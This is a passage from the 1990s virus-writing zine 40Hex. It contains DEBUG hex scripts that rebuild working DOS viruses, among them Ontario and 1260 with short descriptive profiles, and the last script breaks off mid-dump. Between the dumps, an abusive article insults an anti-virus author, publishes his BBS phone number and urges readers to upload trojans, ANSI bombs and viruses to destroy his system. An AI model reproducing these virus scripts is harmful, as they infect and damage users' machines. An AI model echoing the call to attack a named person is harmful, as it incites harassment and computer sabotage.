96 8F A3 e 1A60 9C B3 17 2A F0 86 F0 49 E6 4C E3 BB 8C 2D E3 3D e 1A70 E9 E0 2A D0 79 F0 2D 17 6D C4 E0 54 05 81 08 38 e 1A80 2F 6C 42 C1 DB F4 08 CA 46 D7 B2 8F E1 16 8F 95 e 1A90 22 47 23 5A C6 1E DA C0 FF A0 C7 23 5C 0E 09 E6 e 1AA0 1A BB 3E 12 A9 55 F1 08 56 05 E2 56 2F E2 A0 33 e 1AB0 BB 2A F0 86 F0 49 E6 4D E3 0B D6 2E CE D5 9F 1F e 1AC0 C3 5E C5 3E 30 58 D7 C6 61 16 A7 3C 6C 40 C3 DB e 1AD0 F5 28 CA 46 D7 3D C7 23 FE 0E 95 22 47 23 5A C6 e 1AE0 1E DA C0 FF A0 C7 23 5C 0E 09 E1 1A BB 3E 10 D3 e 1AF0 87 4C 97 2A 4C F7 E5 F1 66 27 45 23 D4 24 15 8F e 1B00 3D BB 8C 39 F6 B3 E3 08 D6 C6 A0 E6 18 EB 23 38 e 1B10 27 8E 47 0B 74 E5 63 16 C4 59 50 E2 1E 18 C8 FF e 1B20 5F 81 1F E5 C1 A3 37 3E 61 16 48 E0 52 18 1E D9 e 1B30 B3 E3 52 35 23 D3 F5 20 CA 2F D0 09 94 6A A2 39 e 1B40 6A C2 C6 D7 53 10 A3 37 31 BA 8E 9F B6 6B A1 C5 e 1B50 9B 39 F4 3D C4 E0 E6 18 61 23 B0 F8 8E 98 61 3E e 1B60 59 C3 6C 43 C3 DB D9 6A 92 39 C8 D2 85 02 2D 47 e 1B70 23 5B C6 67 26 38 EC A0 C5 67 0B 05 E6 E6 06 FF e 1B80 3C F3 3C 5E 08 E5 83 F2 B0 55 F1 E5 2B C1 A3 37 e 1B90 3E B8 96 87 1D 2C 96 37 8D 9D B9 2A D0 86 F0 2E e 1BA0 E3 D5 7D E1 83 9D 61 3E 59 C3 6C F2 69 6C 43 C3 e 1BB0 DB 96 58 D5 C6 6E 0D 9E FF 2B C9 60 E2 C3 A3 37 e 1BC0 3E 59 F6 C6 1E 5A 48 E0 A1 72 E6 6C C6 E0 CA 2F e 1BD0 D2 09 05 1B 85 11 60 E2 D6 63 16 C7 02 2D 9E BB e 1BE0 8C 90 5E B3 E3 18 2A D2 18 8B 85 08 FC C6 61 3E e 1BF0 59 C3 6C 41 C3 9C 3F A9 55 F1 F0 56 05 E1 37 3E e 1C00 6B 1E 7F 6E D5 C7 2B 2B C9 94 D7 2D E1 16 C0 58 e 1C10 D5 C6 FF 2D 2F D9 09 9D B3 DB 97 19 8C D9 18 16 e 1C20 46 E7 D0 45 23 D4 24 18 8E 87 B9 83 78 86 F0 39 e 1C30 F4 2D 98 A2 85 9C 70 3D C7 E0 2D 9D 61 3E 59 C3 e 1C40 60 E5 51 50 2E F9 D5 46 CF D0 85 18 56 04 F2 37 e 1C50 30 61 16 48 E0 2B C9 95 DE 05 A3 54 07 9A D8 11 e 1C60 EE CA 05 44 D3 D9 09 E6 1A B8 8E 3E CE C7 EE 06 e 1C70 43 EB 02 51 E9 9E 4B B4 36 4F 50 02 B9 7E 46 44 e 1C80 13 94 B9 B8 76 43 0B F5 80 4E 58 CB 57 9E BA 55 e 1C90 57 D0 E8 88 FD 0A 2E A0 7C 3C A2 E0 26 F3 E1 2B e 1CA0 10 2E A6 24 C6 65 F1 F9 E5 3D C7 20 8A 07 26 13 e 1CB0 E8 CE 9C EE 3B 89 72 C9 8D C8 08 BF B4 36 9F B2 e 1CC0 98 A7 65 AA EF BF 4B 68 6D 5F 00 49 E6 82 41 54 e 1CD0 3E 9F A2 66 05 1B 13 40 54 70 B8 26 50 2E D9 05 e 1CE0 66 03 61 59 CE 4F EE 05 CC F1 70 DA 2B DD E2 56 e 1CF0 F7 3E FB D7 40 C1 0F E8 67 F8 8F EC 30 E2 20 EF e 1D00 AA FA D7 4C E1 23 E8 DF 11 B2 DA DD 66 2F 9E 11 e 1D10 3D 08 EC 16 40 36 72 03 FB 28 C8 0D 71 DC BA 22 e 1D20 E3 50 5F DD 74 59 73 4C 8E 41 04 54 DC 25 6F 79 e 1D30 C1 9D 73 39 99 C1 66 99 18 67 6E E5 A7 E8 25 FD e 1D40 0A 52 54 AF 19 8F F1 56 8F 4A 57 6C C3 CE E0 ED e 1D50 2A F1 D0 04 DF 24 C2 2B C6 C5 19 CE C1 FC CF AA e 1D60 FB E0 CB 36 40 37 01 10 DE 53 04 48 AC 56 00 76 e 1D70 C0 94 D3 B6 A4 D3 34 6D EB 40 31 7D BF 70 35 65 e 1D80 90 96 C0 3E 09 19 8E 53 45 40 D0 F6 08 90 3E A7 e 1D90 36 04 54 35 0E 7D 93 EF 06 3D A1 5D 36 39 FE 61 e 1DA0 19 08 9A 1E 5D 36 EB 34 FB 2E A6 3D A8 3A 41 2E e 1DB0 D9 25 79 03 4A 80 DB 53 C6 F4 9C 06 28 13 8F 20 e 1DC0 1F 00 08 93 06 8E 0F 52 CE AA 06 CF 3E E6 CE 61 e 1DD0 ED 60 D3 28 53 34 F3 2F 6B C1 A4 E0 12 C8 2C D6 e 1DE0 80 F6 EE 6F C5 67 C2 FD 63 43 F7 78 E4 91 F3 2F e 1DF0 E0 12 C8 2C D6 80 F6 EE 6F C5 6B C2 FD 63 4F F7 e 1E00 78 E6 91 EE 6D C5 65 C2 FD 4B E8 74 E4 C8 2C D6 e 1E10 80 F6 28 24 35 28 97 D7 87 E5 4B 5B 7F F8 8A 2C e 1E20 D3 75 0B FB 1D CB 01 E1 E9 71 C7 74 D6 1F 2F 7B e 1E30 07 E9 0D F7 A1 D7 09 97 F6 F2 54 18 F6 E3 93 74 e 1E40 25 93 ED A6 FA 4E C0 3D 83 28 A0 24 27 FA 45 C0 e 1E50 2F 01 53 6A E8 CA FF 0D 34 2F 91 12 B2 36 CA F7 e 1E60 D7 B4 E9 36 30 0F 74 25 93 ED A6 FB F2 D8 67 03 e 1E70 A6 D6 80 CE DE EC 34 EA D7 20 FC 9F FA 63 BF 23 e 1E80 C4 7A C9 59 DD DF 02 F9 DB F9 E9 30 FA E8 2B 16 e 1E90 E4 07 1F 02 C0 32 50 9E 13 00 A8 CB 58 D9 25 0C e 1EA0 26 EC 36 28 13 0E A9 15 0E 26 D4 06 2A 13 0A 3B e 1EB0 DF 83 CE 9D EC 30 D9 F6 EE AC C4 04 7B 34 98 D0 e 1EC0 4B 82 2F CA C8 5A 94 14 D9 22 51 DA DD CF A8 E5 e 1ED0 CE 63 EC B3 A9 52 F8 4F 0E B6 87 45 8A CF 9F 1C e 1EE0 57 B8 E8 A1 3A 62 AA CE 97 40 CD 9C 29 40 8F DA e 1EF0 B1 75 C6 BA 1C 53 AF EE AA 53 FB A9 53 A2 A9 EE e 1F00 D4 EC 9A CB E1 FB D0 EC 9A D5 E7 9A CF EC FB CE e 1F10 EA F2 BC E6 FC BC FD F2 D9 89 82 BC EF F3 CF E1 e 1F20 B0 91 E0 9A DD E4 9A BB D7 D1 F2 D3 C3 EA C6 C7 e 1F30 BB 89 F3 D2 89 F2 DD E4 F8 C9 FB FD B8 1D B3 92 e 1F40 B6 00 73 B4 94 63 BF DC B9 87 7D 9A 31 9F 68 5D e 1F50 01 04 8C 26 92 FA 89 5C 27 62 5B AF BC 9C 56 45 e 1F60 74 25 BE 74 FD 5F 74 89 B9 0A D0 E9 3B F6 2E A6 e 1F70 35 B3 02 ED E8 CF EE 74 D4 FB C7 CD 22 F9 F1 63 e 1F80 EF 72 CE D7 56 E4 56 FB C4 3E D9 5B DD DF EA 11 e 1F90 E3 14 D7 7E 43 DD F1 61 EF 74 CE D4 DF CE 7A 05 e 1FA0 EA D7 F4 EC 5C FB C4 E2 C9 4D DD 37 31 FB ED 6A e 1FB0 08 E1 55 FC 26 13 E9 08 F8 E8 A1 F8 1A E8 A8 C6 e 1FC0 D3 1C B9 EC F3 6D 47 F9 E0 63 D3 69 CC F3 45 FE e 1FD0 78 EA E3 14 26 5A DF D5 53 16 83 DC 0F 76 03 FB e 1FE0 61 CD 0E E0 E8 78 F6 6B D7 54 F9 DD 6B C8 5C C4 e 1FF0 E8 0C F6 A0 D6 CE C5 F5 51 E2 7A A6 3A 1B 69 C4 e 2000 ED E9 B9 F4 89 F1 9A D6 08 10 3E 89 37 83 D9 0F e 2010 72 23 20 FF CD 15 F7 A5 FC 1C D1 CC E8 02 F8 5C e 2020 3E 80 DA 10 80 0E 97 2F 36 B5 05 B3 1A 88 DA 31 e 2030 88 C9 3E 88 FA CE 8A F2 C2 28 9B E7 0B 19 FC 88 e 2040 C9 3E B3 18 7C 25 E7 28 6D 3D 87 17 18 17 F2 31 e 2050 CF BF 27 10 80 0E 93 2F 36 C1 1D 7E 1B 25 19 38 e 2060 A6 3C 10 22 1E 91 2F 36 3F 0D A9 1A 38 D1 86 0B e 2070 5A 84 17 18 10 F4 0E 58 2E F0 33 09 45 CF 4C FF e 2080 CE D3 EA 33 23 1E 95 05 83 32 DD D8 3A C7 1E E9 e 2090 35 56 33 CB 96 F2 CB C0 17 35 73 2F 3D 83 28 A0 e 20A0 24 27 FA FE C0 FB 83 CC E5 47 31 93 75 2F FA F2 e 20B0 C0 EB 42 38 14 52 CD FB 89 CC 02 DC 7B A0 C6 FA e 20C0 EB 5F A5 D3 DC 7A A0 CB 7A 27 61 FB DD E9 F5 F5 e 20D0 E8 56 F9 46 AC 71 F2 47 87 B9 6C 17 52 6B 9F 84 e 20E0 AC E9 8A 6B 9F 86 AC CF 8D B3 17 8C E9 BD 8C B3 e 20F0 18 A4 AE 99 FA AE 15 50 E6 17 50 0D 9A 8A 81 E9 e 2100 88 AD 5B 29 AF 99 D5 EE 17 48 A2 86 34 52 BF 33 e 2110 2C 8A 03 5B 64 B9 77 71 E5 AD DE F3 83 EF 06 9E e 2120 A2 01 76 3D 8E 20 56 24 9F 7F 23 CF 5D 03 CE 01 e 2130 EA 74 90 AD 63 96 59 81 90 6B EA 74 8D 15 83 9C e 2140 4D E6 67 29 96 AC 81 19 9D 88 B4 0F A3 AB A7 17 e 2150 92 0A BB A9 A7 2D 86 D3 81 78 7F 46 19 A5 7A B4 e 2160 0F B3 4D A7 AB 28 FE 85 C0 3B D5 90 3A 5A 6F 0D e 2170 65 A3 7C 15 5B 71 0B DF 1F A3 C7 1F FD 10 4F A4 e 2180 C0 6B A0 91 D0 BB 20 C0 D9 3D 2D 02 FA E8 95 FA e 2190 39 18 23 21 06 9D 2D 36 E8 28 35 09 D6 D5 CE 21 e 21A0 A8 09 D6 0C C9 B7 06 10 1A A2 10 22 A8 09 B2 1E e 21B0 12 1A F0 9A DD F0 32 DD 06 7D 86 18 2D B0 C0 75 e 21C0 F9 1E 2B 3E 68 2D 21 F0 92 3E 22 D0 F6 CE 60 E9 e 21D0 38 B3 48 30 50 8E 43 A5 99 A2 03 B3 6E 3E 43 A8 e 21E0 76 B6 BB 97 10 A2 5B 23 65 5B 4B 64 5B 3A 86 AC e 21F0 C3 28 4B E8 6B FA 1A B2 A9 53 B4 D7 B0 B3 83 7C e 2200 E4 64 7C 07 65 C4 9C 26 27 96 8A 94 B3 D7 7C CA e 2210 87 8F BB 4B 5D 08 EC 2E 13 37 00 BA 3D 8F 20 9D e 2220 25 08 B0 60 03 3D 89 38 71 25 08 9A 0E 42 36 26 e 2230 1D 13 72 24 D0 02 75 9A C1 14 FE 26 1C 1B 73 61 e 2240 EB 2E 87 73 25 08 98 1E 44 36 2E AD 1D 64 03 3D e 2250 FF 10 9D 25 BB D0 89 E3 F7 40 2C D3 74 DC 48 53 e 2260 9F 37 00 0F D8 2E 16 14 43 C4 E9 E8 26 13 5B A5 e 2270 D0 14 08 9B 07 AF FB C3 AF D6 5B 75 AA 24 26 3D e 2280 80 11 71 43 C4 EA 89 CE D0 9C 08 9C 06 A8 36 2E e 2290 85 73 25 08 9A 1E 44 36 2E AF 1D 64 03 35 3B AC e 22A0 1C 32 54 F0 53 9E 12 00 25 D2 29 E5 50 40 2C D3 e 22B0 74 DC 3D 8B 29 21 ED 65 10 0F 08 28 07 54 D4 F8 e 22C0 DC 3D A1 46 36 2E AD 0D 62 03 3D 8B 28 77 25 08 e 22D0 EC 36 A8 36 9D E5 46 89 C3 43 81 58 17 00 E6 60 e 22E0 0C 08 B2 47 02 2A 46 22 65 03 7E 4E CF 08 93 3E e 22F0 76 37 01 52 35 8B 60 17 2E 85 3C 24 AD 55 02 08 e 2300 B0 2D 02 61 0F 7E 4E 2E AD 35 DF 02 3D 8E 30 CE e 2310 24 CF 6A FE A7 75 06 D9 ED EB E9 3D FE 28 42 24 e 2320 53 DB 81 40 15 FF D8 FB 61 C4 EF 1E C4 F7 40 08 e 2330 B1 4E 04 3D A2 4F 31 B0 25 FB 7D C4 15 1F AF C9 e 2340 B0 27 FB 27 27 F9 72 C7 FB C4 C7 FB 89 C7 FB 35 e 2350 C1 4B 5D 75 42 BB BA 30 B9 72 13 2E A6 24 D6 65 e 2360 F1 F9 7F 48 CF CD 3D 80 28 8F 23 26 67 11 75 42 e 2370 BB BA 30 B9 72 13 2E A6 24 D6 65 F1 F9 7F 48 E9 e 2380 2D E8 34 CE AE E7 35 83 78 8A 83 78 D7 83 0C 98 e 2390 7C 8E 35 A6 78 86 83 78 59 7D 84 E9 AF 2E AF 25 e 23A0 75 03 3D 89 18 64 25 08 9F 1E 5D 36 2E AA 15 7D e 23B0 03 3D A3 5F 36 2E AF 1D 7F 03 3D 89 38 92 25 08 e 23C0 9A 16 B6 36 C3 CE 12 E8 5F F4 22 2B F6 C3 D4 A0 e 23D0 7D 0E 30 C9 15 9D 28 25 01 F1 92 1B 0D 87 38 8B e 23E0 2E 96 49 D4 59 EF DD F6 97 2B F6 91 D5 3D C3 CE e 23F0 42 E7 A0 AD 90 11 B3 3F BD 83 32 9E D0 9B AB 76 e 2400 30 5B 8B 35 86 AB BE B6 96 A0 DF 89 CD 81 8B 35 e 2410 86 A3 BE B6 96 A0 DF 89 CD 95 83 30 9E D0 9B B6 e 2420 26 A0 19 88 57 D7 AD E5 70 BC 5F 70 4C 5E 70 24 e 2430 5E B6 26 A0 19 88 90 16 AB C3 BD 31 90 67 B3 3D e 2440 BD 45 46 78 19 EF B6 52 A8 FE 88 30 5B 8B 79 9E e 2450 A1 BE 67 52 98 5F AB B4 98 AD BE 70 F1 5E 70 91 e 2460 41 21 28 AF 23 E2 BE 20 AF B6 B6 A4 B9 1B 6E BC e 2470 7A 55 56 97 AD 71 70 BD 40 1F D0 E8 08 93 0F 33 e 2480 50 E2 DF D8 2E 87 6A 25 08 9D 06 5B 36 2E A8 0D e 2490 7B 03 3D 8B 10 66 25 08 98 3E 51 36 2E AD 1D 7F e 24A0 03 3D 8B 38 92 25 08 98 16 B6 36 C3 26 42 53 9D e 24B0 33 00 9F 96 23 DB AA D8 0B 81 37 26 13 83 C3 03 e 24C0 E2 F7 8B CB 59 8B D9 59 B4 60 EB 1D 56 E8 02 00 e 24D0 45 69 5A 0E 81 EA A0 23 1F B9 D8 0B 87 D6 81 34 e 24E0 26 13 83 C6 03 E2 F7 EB 08 80 EC 20 E8 89 01 EB e 24F0 DB 81 EE 75 FF 80 3C 01 75 02 5E C3 06 1F E9 30 e 2500 DC 00 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A rcx 2402 w q ------------------------------------------------------------------------------ HR 40Hex Volume 1 Issue 2 0007 Now a word from a real dick When SSS told me how much of a dick this guy I'm about to tell you about is I didn't belive him. His name will be kept, because if we mention it he'll get all souped and think he's public enemy number one in the virus community. Who he is, is the author of a very sad anti-virus program and virus scanner called FLU-SHOT and VIR-X, respectivly. What the man is, is a sad case who wallows in the shadow of John McAffe and curses to his bitter self why he is not a popular anti-virus author. The reason is simple. His product sucks. Well lets put it this way, his self proclaimed 'great' scanner fails to detect over 60% of all viruses out there. On top of that, it was very sinple for a person, who shall remain nameless, to infect his virus scanner, and send out trojan copies all over the USA. The product, FLU-SHOT, is the most annoying, false-alarm causing, piece of trash on the market. Nuff said on the subject. What makes us to pissed at said asshole? Well, take into mind the following, from the documentation of FLU-SHOT. ------------------------------------------------------------------------------ The Challenge to the Worm ========================= When I first released a program to try to thwart their demented little efforts, I published this letter in the archive (still in the FLU_SHOT+ archive of which this is a part of). What I say in it still holds: As for the designer of the virus program: most likely an impotent adolescent, incapable of normal social relationships, and attempting to prove their own worth to themselves through these type of terrorist attacks. Never succeeding in that task (or in any other), since they have no worth, they will one day take a look at themselves and what they've done in their past, and kill themselves in disgust. This is a Good Thing, since it saves the taxpayers' money which normally would be wasted on therapy and treatment of this miscreant. If they *really* want a challenge, they'll try to destroy *my* hard disk on my BBS, instead of the disk of some innocent person. I challenge them to upload a virus or other Trojan horse to my BBS that I can't disarm. It is doubtful the challenge will be taken: the profile of such a person prohibits them from attacking those who can fight back. Alas, having a go with this lowlife would be amusing for the five minutes it takes to disarm whatever they invent. Go ahead, you good-for-nothing little slimebucket: make *my* day! ------------------------------------------------------------------------------ Funny isen't it? Well Mr. Dickburg, I am not an adolesent, nor am I impotent. I lead quite a healty social life, and have no sucidal urges. What I am is a person who (mabey because of some deep down psycological disorder) finds joy in seeing some geeked out, computer nerds system go down the drain in a flash. Oh yes there are others like me out there, many others. It (virus writing) is a joke. It is done for a good laugh, to see dickheads like you lose time and money. So my friend, at this time I start an active campain after you ass. Anyone out there who wants to make some dicks day, call this assholes cheap BBS and lets take him down. The number is (212)-889-6438. Trojans, Ansi-Bombs, and all Viruses are acepted. Go to it! 40Hex Volume 1 Issue 2 0008 The Ontario Virus Here a quick nice little virus from our boyz up north. V Status: Rare Discovered: July, 1990 Symptoms: .COM & .EXE growth; decrease in system and free memory; hard disk errors in the case of extreme infections Origin: Ontario, Canada Eff Length: 512 Bytes Type Code: PRtAK - Parasitic Encrypted Resident .COM & .EXE Infector Detection Method: ViruScan V66+, Pro-Scan 2.01+, NAV Removal Instructions: SCAN /D, or Delete infected files General Comments: The Ontario Virus was isolated by Mike Shields in Ontario, Canada in July, 1990. The Ontario virus is a memory resident infector of .COM, .EXE, and overlay files. It will infect COMMAND.COM. The first time a program infected with the Ontario Virus is executed, it will install itself memory resident above the top of system memory but below the 640K DOS boundary. Total system memory and free memory will be decreased by 2,048 bytes. At this time, the virus will infect COMMAND.COM on the C: drive, increasing its length by 512 bytes. Each time an uninfected program is executed on the system with the virus memory resident, the program will become infected with the viral code located at the end of the file. For .COM files, they will increase by 512 bytes in all cases. For .EXE and overlay files, the file length increase will be 512 - 1023 bytes. The difference in length for .EXE and overlay files is because the virus will fill out the unused space at the end of the last sector of the uninfected file with random data (usually a portion of the directory) and then append itself to the end of the file at the next sector. Systems using a sector size of more than 512 bytes may notice larger file increases for infected files. Infected files will always have a file length that is a multiple of the sector size on the disk. In the case of extreme infections of the Ontario Virus, hard disk errors may be noticed. Ontario uses a complex encryption routine, and a simple identification string will not identify this virus. ------------------------------------------------------------------------------ n ontario.com e 0100 E9 1D 00 1D 66 65 63 74 65 64 20 50 72 6F 67 72 e 0110 61 6D 2E 20 0D 0A 24 BA 02 01 B4 09 CD 21 CD 20 e 0120 90 E8 E9 01 93 84 7B D9 F8 69 7C 3C 84 7B B6 A5 e 0130 71 60 0F CB 65 B7 BB 0A A3 07 55 97 7F 86 BE 9A e 0140 FF 84 55 0D E5 84 79 AA F7 1A 79 86 F7 47 30 0A e 0150 A0 05 55 87 7B 04 7B 25 69 84 56 04 7B 27 69 84 e 0160 F5 44 75 9B F0 71 48 7B C2 80 79 78 88 20 F5 5D e 0170 81 43 7D 00 7B FB 7B 27 FD 84 80 3C 84 CF B6 A5 e 0180 64 9A 7C 8F 96 F0 77 09 CD FF 7B 3B 7B 85 2C 78 e 0190 DE 21 B8 08 BB AA 7A 82 06 84 91 6F 6E CD 15 B9 e 01A0 84 7B 0E 86 3B 4B FB 78 30 F1 6F B8 78 F0 6B B8 e 01B0 84 F1 72 8A 64 3E A6 85 93 8D 7B 4B 93 81 7B AA e 01C0 84 AA 7B 86 7D 9A 29 D5 28 D4 C3 84 38 6C 5D 85 e 01D0 09 9C 8D 45 7A F0 70 04 9A 7A C3 85 38 6C 6D 85 e 01E0 09 8C C3 86 46 6C 75 85 08 87 92 86 7A 0F A3 8A e 01F0 64 3C 7B D3 93 7B 7B 0D 75 80 79 0D 6D 82 79 3E e 0200 73 86 C2 9F 7B 30 44 6C 97 84 09 CC FA BA 73 86 e 0210 36 DE 0F BD DB 8D 79 BE 7D 8F 79 F0 4C B7 A9 B7 e 0220 B2 3C 79 C6 93 4B 7B F6 50 B9 7B 64 0C A2 2B 25 e 0230 73 86 D8 FF 7B 25 71 86 D8 F9 7B DC 56 87 7B 42 e 0240 7D 8C 79 6D D8 8D 79 26 70 86 90 CD EB 07 45 98 e 0250 79 85 0E 87 92 01 7B 25 77 86 C2 84 79 73 9A D4 e 0260 29 35 7F 57 B1 57 93 87 B9 AF 7D 94 79 D4 DA 98 e 0270 79 27 00 84 DA 9A 79 81 6B 84 D8 F9 7B DC D8 9A e 0280 79 43 7D 98 79 85 7B 7B 7D 88 79 DD 21 3C 7B C6 e 0290 93 E7 7B F6 3C 04 4D 7C 7A 8C 48 44 F5 5C DB E8 e 02A0 7F 8A 64 8A 7C 26 97 85 48 72 C4 A0 79 D3 C2 84 e 02B0 79 78 88 20 C5 AC 79 6C 21 84 21 3D 7B 86 CF C4 e 02C0 93 B7 7B F6 6C B7 B2 B7 A9 3C 7B C6 93 A3 7B F6 e 02D0 70 3E 73 86 C2 9F 7B 30 3B 6C 61 84 F0 92 7D 86 e 02E0 F0 8A 7F 86 C3 85 2C 6C 77 84 CF BA 93 83 7B DC e 02F0 20 DD 21 9B 7C 47 E7 AA 84 9A 7B 86 B8 C7 41 D8 e 0300 38 CB 36 C9 3A CA 3F AA 38 CB 36 84 84 5E 56 2E e 0310 8A 84 E8 01 B9 E8 01 F6 D0 2E 30 04 46 E2 F8 C3 rcx 220 w q ------------------------------------------------------------------------------ HR 40Hex Volume 1 Issue 2 0009 The 1260 Virus Here's a nice little encrypting virus written in America. Aliases: V2P1 V Status: Research Discovery: January, 1990 Symptoms: .COM file growth Origin: Minnesota, USA Eff Length: 1,260 Bytes Type Code: PNC - Parasitic Encrypting Non-Resident .COM Infector Detection Method: ViruScan V57+, IBM Scan, Pro-Scan 1.4+, F-Prot 1.12+, AVTK 3.5+, VirHunt 2.0+, NAV Removal Instructions: CleanUp V57+, Pro-Scan 1.4+, F-Prot 1.12+, VirHunt 2.0+ General Comments: The 1260 virus was first isolated in January, 1990. This virus does not install itself resident in memory, but is it extremely virulent at infecting .COM files. Infected files will have their length increased by 1,260 bytes, and the resulting file will be encrypted. The encryption key changes with each infection which occurs. The 1260 virus is derived from the original Vienna Virus, though it is highly modified. This virus was developed as a research virus by Mark Washburn, who wished to show the anti-viral community why identification string scanners do not work in all cases. The encryption used in 1260 is one of many possible cases of the encryption which may occur with Washburn's later research virus, V2P2. ------------------------------------------------------------------------------ n 1260.com e 0100 E9 1D 00 6E 66 65 63 74 65 64 20 50 72 6F 67 72 e 0110 61 6D 2E 20 0D 0A 24 BA 02 01 B4 09 CD 21 CD 20 e 0120 90 B8 89 86 4B B9 FD 04 FC 46 BF 47 01 90 2B DA e 0130 31 0D 33 D1 2B D8 31 05 47 42 4B 40 90 E2 EE 4B e 0140 4B 42 47 43 42 F8 47 FF 18 71 18 D2 A5 40 19 E2 e 0150 6D B4 08 F8 5C FA F4 A6 EB 08 55 F2 F4 73 82 1A e 0160 65 C4 C4 4F 82 24 55 FA F4 7B B2 16 55 F4 E4 6F e 0170 A2 00 1F F9 0C C2 F7 7D 06 73 32 66 F4 45 84 87 e 0180 3D 81 84 7A 77 5E 7F 04 40 C2 39 D7 C8 FA 28 C1 e 0190 B6 E1 0D 64 E6 FC 40 D9 39 D3 38 FA 71 A4 38 0A e 01A0 6B E1 82 38 C3 71 22 77 36 13 F4 42 EE 37 C5 E0 e 01B0 B2 6C E2 CA E4 45 F4 F6 AA A4 75 30 68 FA A8 BE e 01C0 05 83 F7 A9 BC FF F5 5B 5B 86 18 15 0F A5 E2 6E e 01D0 9B 17 6E 39 64 3D 54 F7 7E 0D 1E CD 65 37 46 B9 e 01E0 31 C3 B0 C3 2C DF F7 3B EB A5 D3 79 EB D7 E5 6C e 01F0 1B C5 6E 91 11 7A 32 56 F5 5F C9 CC 81 F0 B9 87 e 0200 F1 87 2F 6C 71 37 4B F7 F5 A8 EA 7E 83 0F 65 1A e 0210 1A 97 E6 57 B9 51 7C 89 07 78 06 76 33 6D C5 7E e 0220 C3 C3 36 63 4E 08 41 B9 7E 25 74 35 54 FB 5C E4 e 0230 E5 2E C4 0C E3 6B 39 43 BA 3E D4 84 F6 10 9A CB e 0240 8E 87 F2 07 21 E4 CE EF 86 19 73 4C 09 FC E2 18 e 0250 96 01 61 5C 19 FC F8 84 2C 7F 8C 02 A4 7D 04 3F e 0260 C2 68 68 FC C2 89 08 AE 4A F4 B1 7B 24 7D 20 41 e 0270 E2 29 C3 69 AC 0A 4A F1 B1 75 13 0E 0D 77 54 01 e 0280 40 25 82 4D A3 44 F0 CD 79 22 73 32 53 FC 2F C1 e 0290 91 E0 0B 88 E3 30 79 28 4A F4 A5 3D D3 75 8C 38 e 02A0 4B 92 38 74 FD 45 F1 F0 79 22 73 32 62 FC 2F C1 e 02B0 2E BF CB FA 2E 09 3A F3 F2 38 B0 C7 E3 30 7A CF e 02C0 0F 49 C1 3E 85 F3 FD 45 FD FB 30 DE 8E F0 04 FA e 02D0 EC 27 67 36 21 2C A9 37 AC 37 78 57 FE F3 01 2F e 02E0 A4 4F 59 CF 4C 32 20 FB 31 9F 12 01 31 87 18 00 e 02F0 42 E8 21 7D F6 FE 49 D3 30 DA CE 2E 31 0D FA D9 e 0300 7D 47 4C A6 A9 F2 31 37 BE BD 0D 33 1A 31 12 EF e 0310 21 CF CC 2A E9 3F 31 BA BB 13 31 78 F3 77 CA CF e 0320 94 07 CD 4E 0C D4 FC 76 71 FA FD 33 6D 8B 17 EF e 0330 66 AD 1D 23 D3 44 BB 15 74 7F F9 FF 31 1A 6F F1 e 0340 C1 08 8F E0 D0 F0 30 2E A7 24 7D 3D DB F2 2B A8 e 0350 0A ED EC 06 F8 F3 75 80 12 7B 3F EE FC 3E EA 2F e 0360 8A 2C 4F CE 00 BE 58 FF FD 7B 3F EE FC 3E 5B B1 e 0370 14 EA 55 EC EC 79 8A 12 30 00 87 38 D9 F2 7F 2A e 0380 07 CC 62 A5 4B BD 56 75 B2 16 7D 17 4A F1 D7 21 e 0390 98 E3 56 EE EC 1A 4A FE 17 17 30 75 8A 1E 9A 45 e 03A0 32 06 6D D6 F5 F2 7D 38 AB FA 30 C2 41 35 E2 EC e 03B0 67 3D 1F 4A B2 A9 14 6C FC FF FA FE AC 0D EE C3 e 03C0 E4 90 2E 32 E1 F7 31 9C EB E7 45 FF BF 4A ED EF e 03D0 57 EB ED 22 CC 81 F2 4B BD 42 FE FF 31 27 92 19 e 03E0 4C 09 5E CF 00 D2 76 A9 07 70 B3 07 7C 12 0D 10 e 03F0 6C 22 F2 EF 55 F2 AA 32 DC 4F C3 32 DC 4B 8C CC e 0400 06 C5 7B 04 5B 72 3F 5E FD 36 DC E1 76 A5 11 61 e 0410 B3 15 59 F5 20 D2 E2 A6 CE 3B CE 24 CE 21 FE 39 e 0420 46 2E 72 CF CC A4 15 51 FD 38 76 B1 0D 72 1C D3 e 0430 6C 6A 2C A7 7F 22 34 2E 34 2A 34 76 B3 03 8C EE e 0440 0A 0B 5C 4E 3E 33 07 2F 2E A1 3D A4 AE 33 06 35 e 0450 11 6D 3E 99 17 FB 2E 77 3F 29 1E AC 29 7B 06 94 e 0460 8E 1F CD 8A 22 7B 0E 0F 5A 3B 44 FC FE 18 30 13 e 0470 65 2A CD AA 08 CB B8 1A 8B 0B 3D AF 75 2C DE DA e 0480 05 FF 8C 73 C9 F2 77 8A 1A 54 CE F8 74 B7 E9 E0 e 0490 EF 60 A9 EB B0 A8 A5 33 AD 73 22 AC A8 7B B8 28 e 04A0 62 F8 CA 46 89 F7 DA 02 76 BF F9 A2 A6 AB 21 70 e 04B0 F0 B8 56 EC EE A0 E1 77 B8 14 D3 7E FE 0A AD 03 e 04C0 0D 80 4B E3 20 96 FD 5C F9 FB F3 A7 5E F5 ED 4C e 04D0 E3 EB 16 B7 F2 6E 3E 63 E3 AB 45 FF FD A3 D2 44 e 04E0 8B 2B 37 6C C1 F3 76 B9 21 58 F9 FF 76 B5 33 4C e 04F0 EB EB 66 A9 0F 50 F3 FF 06 A3 E2 62 3E 4C CA 8E e 0500 35 02 0B 36 70 F7 05 03 BB B0 6D CE F8 C2 E0 DC e 0510 3C D8 34 C4 35 D8 24 D4 27 6B BD B8 BE B5 8F 37 e 0520 86 5B 2F 28 CE F3 FE FC FE FD FC F6 FC F9 EC E4 e 0530 EC E7 EC E2 EF FD FF EF FF E9 FF EB FF E5 0F 17 e 0540 0F 11 0C 13 0C EE FD E0 FD E5 FD DE FD D3 ED CC e 0550 ED C9 ED CA 67 BC 14 75 BA 10 77 00 7D 1D 7A CD e 0560 24 EB CC 7A 8C 4B 10 FA 77 2C 7D 14 21 F1 21 CF e 0570 70 BA 67 A0 04 79 BA 14 77 04 7D 11 4A F1 64 8D e 0580 8C D2 11 4D BD F7 CD F3 BC BD 1E 06 3F 19 F9 A7 e 0590 05 F7 EC C4 C2 B1 B3 B3 FC AA BD AA B4 CF 98 87 e 05A0 82 93 E2 8D 83 BF FC B3 FC FA FC FE FC F2 EC EE e 05B0 EC EA EC EE EC F2 FC FE FC FA FC FE FC F2 0C 0F e 05C0 0D 0B 0D 0F 0D F3 FD FF FD FB FD FF FD F3 ED EF e 